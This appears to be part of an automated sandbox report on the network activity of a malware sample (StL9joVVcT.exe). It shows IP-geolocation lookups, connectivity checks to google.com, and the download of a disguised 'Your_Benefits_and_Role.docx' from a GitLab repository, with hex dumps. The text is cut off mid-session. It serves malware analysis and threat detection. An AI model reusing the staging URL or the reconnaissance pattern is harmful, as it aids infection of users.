                                                                                                                                                                                                                Jan 14, 2025 12:48:30.686321974 CET192.168.2.61.1.1.10xde28Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.907803059 CET192.168.2.61.1.1.10x9a6aStandard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                Jan 14, 2025 12:48:02.388122082 CET1.1.1.1192.168.2.60xe1eaNo error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Jan 14, 2025 12:48:02.406476021 CET1.1.1.1192.168.2.60xdf36No error (0)google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.338455915 CET1.1.1.1192.168.2.60x88fbNo error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.693099976 CET1.1.1.1192.168.2.60xde28No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.693099976 CET1.1.1.1192.168.2.60xde28No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.693099976 CET1.1.1.1192.168.2.60xde28No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.915360928 CET1.1.1.1192.168.2.60x9a6aNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                • gitlab.com
                                                                                                                                                                                                                • google.com
                                                                                                                                                                                                                • www.google.com
                                                                                                                                                                                                                • api.ipify.org
                                                                                                                                                                                                                • ip-api.com

                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                0192.168.2.649892208.95.112.1804924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.921536922 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                                                                                Host: ip-api.com
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.380508900 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:31 GMT
                                                                                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                Content-Length: 306
                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                X-Ttl: 31
                                                                                                                                                                                                                X-Rl: 42
                                                                                                                                                                                                                Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                1192.168.2.649905208.95.112.1804924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                Jan 14, 2025 12:48:33.639313936 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                                                                                Host: ip-api.com
                                                                                                                                                                                                                Jan 14, 2025 12:48:34.101788044 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:33 GMT
                                                                                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                Content-Length: 306
                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                X-Ttl: 30
                                                                                                                                                                                                                X-Rl: 41
                                                                                                                                                                                                                Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                0192.168.2.649709172.65.251.784434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC107OUTGET /app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false HTTP/1.1
                                                                                                                                                                                                                Host: gitlab.com
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:03 GMT
                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                Content-Length: 16036
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                CF-Ray: 901d650f5f407cf9-EWR
                                                                                                                                                                                                                CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                Cache-Control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                                                                                Content-Disposition: attachment; filename="Your_Benefits_and_Role.docx"; filename*=UTF-8''Your_Benefits_and_Role.docx
                                                                                                                                                                                                                ETag: "c9f854e67f415052529ad6dc8e14658c"
                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC2134INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                                                Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC508INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 42 74 52 6f 59 6e 6a 46 33 64 48 59 4a 25 32 46 35 76 59 6b 34 43 25 32 42 4e 67 41 35 74 6a 30 61 57 51 62 42 4f 4f 43 4b 25 32 42 25 32 42 38 4d 65 49 4e 51 66 79 6b 75 5a 67 47 4b 35 4f 75 54 5a 58 4e 62 5a 65 35 65 49 6b 6c 5a 53 6e 52 49 59 43 37 68 52 75 78 68 25 32 42 45 25 32 46 38 53 41 66 48 79 78 67 43 44 4b 68 4a 55 6e 6d 75 41 6d 41 4b 35 55 50 74 50 53 72 51 25 32 46 69 53 77 7a 46 72 31 57 41 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BtRoYnjF3dHYJ%2F5vYk4C%2BNgA5tj0aWQbBOOCK%2B%2B8MeINQfykuZgGK5OuTZXNbZe5eIklZSnRIYC7hRuxh%2BE%2F8SAfHyxgCDKhJUnmuAmAK5UPtPSrQ%2FiSwzFr1WA%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC929INData Raw: 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 32 91 6f 57 66 01 00 00 a5 05 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: PK!2oWf[Content_Types].xml (
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC1369INData Raw: 03 04 14 00 06 00 08 00 00 00 21 00 1e 91 1a b7 ef 00 00 00 4e 02 00 00 0b 00 08 02 5f 72 65 6c 73 2f 2e 72 65 6c 73 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: !N_rels/.rels (
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC1369INData Raw: be ce a8 7e 96 a2 cc b7 d2 f8 d7 49 7b b7 75 af 8f 48 74 8e 90 55 1b e7 ae c3 28 be 6e 32 f7 31 cd c1 eb a6 e1 f0 dd 22 13 92 ce 12 98 11 98 1a 01 6b 21 7a 05 f0 7f 50 3a 3c e8 53 f6 a4 db 71 ad f1 24 2a 09 7a ad d6 2d f0 b4 99 88 56 78 cc a1 c3 19 e6 54 d2 77 a0 e6 6e 10 04 8e e1 fb 2d dd 0a 51 4e 61 ab 31 f0 8d 41 df 1f 41 eb 10 38 61 74 07 4d c6 c0 70 ad ae bd 69 9a ca 17 1a 7d 36 a7 65 a2 0e 7b a6 3b 4d 7a 16 53 89 07 59 1d 8a 3f e0 b6 25 85 b0 e2 38 ad 4e d5 e2 15 fb 6d 9d fa ee ce 76 f0 8b 53 d9 11 3b d3 a2 66 5e 51 8b 6c fe 90 c7 a1 ba 9d 8a 82 63 c4 19 62 ab aa fa 1a 3d f6 c8 07 a1 b6 0c 8b 9c 86 b0 b8 b9 64 05 93 4b d6 ba 25 df e5 a9 3e 5f 70 45 93 6f fd f0 db f7 c0 8e 98 02 15 27 ef 69 46 17 4c 92 ab 3b 96 0a c5 de 7c db 27 cf 64 7d 79 06 fd b9
                                                                                                                                                                                                                Data Ascii: ~I{uHtU(n21"k!zP:<Sq$*z-VxTwn-QNa1AA8atMpi}6e{;MzSY?%8NmvS;f^Qlcb=dK%>_pEo'iFL;|'d}y
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC1369INData Raw: 6b f6 cf 5e 03 3c d6 52 7b a7 58 ea 18 cc 0f c8 85 fc 7b 01 06 b8 90 0c d3 43 b2 f9 5e 8c df d8 d2 b4 c4 ef 69 9a 61 b4 21 22 d4 85 ec 51 94 f2 8c 6b 16 a2 49 be 40 ae 5a 11 8d 39 67 49 d4 8c 5d f4 26 7e 7f 3c 38 7b 4c 3c 0b b4 23 85 94 1d 38 7f 97 ac 18 95 3a 9b 62 4f 39 93 58 e7 d2 38 6f 1c 62 bb 62 1a 56 7d 23 74 51 e8 dc 54 70 a5 48 58 13 38 5d 27 b0 ec f1 c4 7d 85 70 26 00 e4 1d cb 80 b6 b2 68 0a b8 8c 25 a3 0f 5a 32 44 9b 3d 50 f7 e9 1a a8 a5 2e 19 6d 1a 58 b6 e4 52 64 da fa 9b 60 da 75 2d db ea 99 17 5f 98 3d 49 45 7d c6 72 f2 90 89 c7 84 01 6f 41 05 ad 8b dc 3b b1 fa 4a d7 b5 ef 83 f7 f0 5f 55 ef 7e 5f d5 bb 03 c8 45 92 ad af 68 94 e2 9b fe c8 30 26 ee c5 e7 69 27 a1 79 0f 81 56 7f 82 ae ea 4c 80 54 f1 00 f1 b8 a2 39 c8 13 69 b5 31 19 93 f9 94 3e
                                                                                                                                                                                                                Data Ascii: k^<R{X{C^ia!"QkI@Z9gI]&~<8{L<#8:bO9X8obbV}#tQTpHX8]'}p&h%Z2D=P.mXRd`u-_=IE}roA;J_U~_Eh0&i'yVLT9i1>
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC1369INData Raw: 49 42 16 f0 db 08 8b a8 08 34 2a 9c 02 1c f5 5c 7d 16 b3 de ec 75 89 2e 6c 7c 21 38 5b 73 10 cb 98 10 14 66 f1 02 70 94 bf 66 36 c7 f0 1c 93 a1 b1 86 0a 59 aa 09 c7 d9 9a 83 78 8a 09 f1 85 e5 fb 9f 93 9c 98 27 10 7e f5 db f2 1f 00 00 00 ff ff 03 00 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 b6 f4 67 98 d2 06 00 00 c9 20 00 00 15 00 00 00 77 6f 72 64 2f 74 68 65 6d 65 2f 74 68 65 6d 65 31 2e 78 6d 6c ec 59 4b 8b 1b 47 10 be 07 f2 1f 86 b9 cb 7a cd e8 61 ac 35 d2 48 f2 6b d7 36 de b5 83 8f bd 52 6b a6 ad 9e 69 d1 dd da b5 30 86 60 9f 72 09 04 9c 90 43 0c b9 e5 10 42 0c 31 c4 e4 92 1f 63 b0 49 9c 1f 91 ea 1e 49 33 2d f5 c4 8f 5d 83 09 bb 82 55 3f be aa fe ba aa ba ba 34 73 e1 e2 fd 98 3a 47 98 0b c2 92 8e 5b 3d 57 71 1d 9c 8c d8 98 24 61 c7 bd 7d 30 2c b5 5c
                                                                                                                                                                                                                Data Ascii: IB4*\}u.l|!8[sfpf6Yx'~PK!g word/theme/theme1.xmlYKGza5Hk6Rki0`rCB1cII3-]U?4s:G[=Wq$a}0,\
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC1369INData Raw: af c0 e5 e4 20 f5 48 dc f7 52 46 10 6e 10 d2 63 e5 a7 54 7e e5 dd 53 f7 74 91 31 cd 6d d7 2c db 6b 2b ae a7 e3 69 83 44 2e dc 4c 12 b9 30 8c e0 f2 d8 1c 3e 65 5f b7 33 97 1a f4 94 29 b6 69 34 5b 1f c3 d7 2a 89 6c e4 06 9a 98 3d e7 18 ce 5c dd 07 35 23 34 eb b8 13 f8 c9 04 cd 78 06 fa 84 ca 54 88 86 49 c7 1d c9 a5 a1 3f 24 b3 cc b8 90 7d 24 a2 14 a6 a7 d2 fd c7 44 62 ee 50 12 43 ac e7 dd 40 93 8c 5b b5 d6 54 7b fc 44 c9 b5 2b 9f 9e e5 f4 57 de c9 78 32 c1 23 59 30 92 75 61 2e 55 62 9d 3d 21 58 75 d8 1c 48 ef 47 e3 63 e7 90 ce f9 2d 04 86 f2 9b 55 65 c0 31 11 72 6d cd 31 e1 b9 e0 ce ac b8 91 ae 96 47 d1 78 df 92 1d 51 44 67 11 5a de 28 f9 64 9e c2 75 7b 4d 27 b7 0f cd 74 73 57 66 7f b9 99 c3 50 39 e9 c4 b7 ee db 85 d4 44 2e 69 16 5c 20 ea d6 b4 e7 8f 8f 77
                                                                                                                                                                                                                Data Ascii: HRFncT~St1m,k+iD.L0>e_3)i4[*l=\5#4xTI?$}$DbPC@[T{D+Wx2#Y0ua.Ub=!XuHGc-Ue1rm1GxQDgZ(du{M'tsWfP9D.i\ w
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC1369INData Raw: d0 a7 8f a0 9a 17 9f b6 d2 e6 a9 4b cf 2e d5 70 f8 f6 d2 df a3 ae 15 62 de ff b2 6a 8b 8c ca 95 29 10 bc 44 55 d5 d4 59 b6 09 26 1e 25 9b 52 07 a6 34 34 bc 15 f0 0d 68 5f b2 4d d8 62 a1 c5 c2 06 b3 2f 28 37 3b 03 ed 76 d1 c9 42 27 3b d2 8b 9c 2c ea 64 b1 93 c5 9d 2c 71 b2 a4 93 0d 9d 6c 68 64 25 74 16 49 09 7f 84 92 77 4b 23 5f 0b 4a c5 0e 17 b7 1d fe 42 d4 24 41 95 a8 c2 f3 66 1a 41 79 89 46 d0 8e 27 d5 db a6 f8 09 e6 16 2e 88 86 4f eb 8a 14 0c 3d 99 31 16 0e 8d 79 ab 0d 13 45 d4 fa 44 d7 60 46 b9 3a 65 30 83 be bd e4 fe 89 b1 2d f1 6f 62 31 53 32 27 50 8e ab 3d cb ba a1 f3 47 13 38 25 0a 1a 44 05 f3 49 0b 79 8a 05 71 5a 88 fc ce 0c e7 b8 91 27 71 18 5f 8f c6 b3 06 4e ec 5c d3 b6 87 c0 b9 7f c6 eb 29 52 b8 68 31 67 9a 34 a6 5f e3 69 12 8d 82 70 d4 bf 09
                                                                                                                                                                                                                Data Ascii: K.pbj)DUY&%R44h_Mb/(7;vB';,d,qlhd%tIwK#_JB$AfAyF'.O=1yED`F:e0-ob1S2'P=G8%DIyqZ'q_N\)Rh1g4_ip
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC1369INData Raw: fa 43 88 6b b8 c8 5d ba 55 44 03 3e f9 70 1f 66 b6 b1 5c 8a ae 11 43 00 20 04 20 04 20 a4 83 ad 00 21 00 21 c2 52 80 10 80 10 80 10 80 10 80 10 80 90 cf 08 21 ec 48 d0 1b 42 0c cb 71 91 b1 78 a8 22 ea 0f 21 96 63 ce cc 07 04 10 02 10 02 10 32 cc 56 80 10 80 10 61 29 40 08 40 08 40 08 40 08 40 08 40 c8 67 84 10 b6 7f f5 86 10 53 5f d8 aa 3b 9f 57 11 f5 87 90 e5 72 a1 2c dd b9 2e ba 46 0c 01 80 10 80 10 80 90 0e b6 02 84 00 84 08 4b 01 42 00 42 00 42 00 42 00 42 00 42 3e 23 84 b0 c5 b6 3f 84 58 1a 52 94 85 53 45 d4 1f 42 e6 68 b1 b4 10 32 45 d7 88 21 00 10 02 10 02 10 d2 c1 56 80 10 80 10 61 29 40 08 40 08 40 08 40 08 40 08 40 c8 67 84 10 b6 32 f4 87 10 db b4 35 07 59 55 44 fd 21 64 36 77 6d 57 59 ea a2 6b c4 10 00 08 01 08 01 08 e9 60 2b 40 08 40 88 b0 14
                                                                                                                                                                                                                Data Ascii: Ck]UD>pf\C !!R!HBqx"!c2Va)@@@@@@gS_;Wr,.FKBBBBBB>#?XRSEBh2E!Va)@@@@@@g25YUD!d6wmWYk`+@@


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                1192.168.2.649715142.250.185.784434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: google.com
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                Location: https://www.google.com/
                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-6h4Mb9xaiE3snmROLKup0g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:03 GMT
                                                                                                                                                                                                                Expires: Thu, 13 Feb 2025 11:48:03 GMT
                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                Content-Length: 220
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                2192.168.2.649717142.250.185.784434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: google.com
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                Location: https://www.google.com/
                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-F4Ouyc4NyGuF8miEwSQ2FA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:03 GMT
                                                                                                                                                                                                                Expires: Thu, 13 Feb 2025 11:48:03 GMT
                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                Content-Length: 220
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                3192.168.2.649720142.250.185.784434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: google.com
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                Location: https://www.google.com/
                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-T6p3rrpZXyze-kLKE631FQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
